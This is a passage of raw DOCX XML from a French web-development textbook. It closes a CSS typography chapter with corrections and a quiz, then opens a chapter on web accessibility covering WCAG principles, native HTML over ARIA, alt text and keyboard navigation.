          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les marges fusionnent entre paragraphes : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin-block: 0 var(--unite)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite le doublement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 22.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque niveau multiplie la taille par 0,9 : 0,9³ ≈ 0,73, ce qui rend le texte trop petit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remplacer par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-size: .95rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à chaque niveau donne une taille stable, indépendante de la profondeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reste préférable pour un composant dont tous les espacements doivent suivre la taille de police locale, comme un bouton.</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp(1rem, 2vw, 1.5rem)</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Choisit toujours 1rem</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Borne une valeur fluide entre 1rem et 1,5rem</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Multiplie la taille par 2</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Désactive le zoom</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 xml:space="preserve">Pourquoi éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-size: 2vw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul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C'est trop grand</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 texte ne respecte pas le zoom et devient illisible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Ce n'est pas supporté</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Cela ralentit le rendu</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Quelle unité reste stable quel que soit le niveau d'imbrication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em</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rem</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ex</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Sur quoi se construit un rythme vertical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La taille des images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Un multiple de l'interligne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La largeur de la fenêtre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La couleur de fond</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Quelles largeurs tester en priorité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Seulement 1920</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320, 768, 1024 et la largeur de l'écran</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Uniquement 375</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Toutes les largeurs possibles</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La valeur idéale suit la largeur, mais reste comprise entre les deux bornes.</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Une taille uniquement liée à la fenêtre ignore les préférences de l'utilisateur et peut devenir minuscule.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se rapporte toujours à la racine, contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui dépend du parent.</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L'unité de rythme dérive de la hauteur de ligne du corps de texte, ce qui aligne les blocs sur une grille invisible.</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Quatre largeurs couvrent l'essentiel des problèmes de composition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>23. Accessibilité web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rendre un site utilisable par tous, sans exception : la qualité qui bénéficie à l'ensemble des utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 22</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Comprendre les quatre principes WCAG.</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Écrire du HTML qui fonctionne avec un lecteur d'écran.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Garantir une navigation complète au clavier.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Concevoir des formulaires et des messages compréhensibles.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Prioriser les corrections selon leur impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>23.1 Quatre principes, un cadre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les WCAG organisent les exigences en quatre principes : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>perceptible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>utilisable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>compréhensible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>robuste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Chaque critère se range dans l'un d'eux et possède un niveau : A (indispensable), AA (standard attendu), AAA (renforcement).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="34" name="Picture 34"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f32.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.32 — Les quatre principes WCAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.72 — Trois niveaux de conformité</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155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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3730"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Minimum vital</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3730"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tous les sites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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AA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Standard courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Obligation légale dans de nombreux pays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3730"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Excellence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3730"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenus spécialisés</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TECHNOLOGIE D'ASSISTANCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lecteur d'écran, agrandisseur, plage braille, commande vocale : tout outil qui compense un besoin particulier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>23.2 Le HTML d'abord</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La majorité des problèmes d'accessibilité viennent d'un HTML mal choisi, pas d'un manque d'ARIA. Un bouton est un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;button&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, un lien est un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;a&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, un titre est un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Les rôles ARIA ne remplacent pas ces éléments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Choisir l'élément natif avant d'ajouter ARIA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 Inaccessible : un div cliquable --&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="bouton" onclick="envoyer()"&gt;Envoyer&lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Accessible nativement --&gt;</w:t>
        <w:br/>
        <w:t>&lt;button type="button" onclick="envoyer()"&gt;Envoyer&lt;/button&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Un lien qui navigue, un bouton qui agit --&gt;</w:t>
        <w:br/>
        <w:t>&lt;a href="/contact"&gt;Nous contacter&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;button type="button" aria-expanded="false"&gt;Ouvrir le menu&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LA PREMIÈRE RÈGLE D'ARIA</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>« Ne pas utiliser ARIA » est la première règle des spécifications. Un élément natif apporte gratuitement le rôle, le focus, les événements clavier et l'annonce.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Nommer ce qui informe, masquer ce qui décore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 Le nom accessible vient du contenu, ou d'un attribut --&gt;</w:t>
        <w:br/>
        <w:t>&lt;button&gt;&lt;svg aria-hidden="true"&gt;…&lt;/svg&gt; Fermer&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;button aria-label="Fermer la fenêtre"&gt;&lt;svg</w:t>
        <w:br/>
        <w:t xml:space="preserve">  aria-hidden="true"&gt;…&lt;/svg&gt;&lt;/button&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Les icônes seules doivent être nommées ; les icônes décoratives masquées</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src="logo.svg" alt="Espritropic"&gt;      &lt;!-- informative --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src="motif.svg" alt=""&gt;                 &lt;!-- décorative --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>23.3 Navigation au clavier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Toute fonctionnalité doit être utilisable sans souris. Cela implique un ordre de tabulation logique, un focus toujours visible et des raccourcis prévisibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.73 — Six touches et les attentes associées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180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Touche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Comportement attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Piège fréquent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élément suivant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tabindex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> positif qui casse l'ordre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Maj+Tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Élément précédent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Focus piégé sans issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
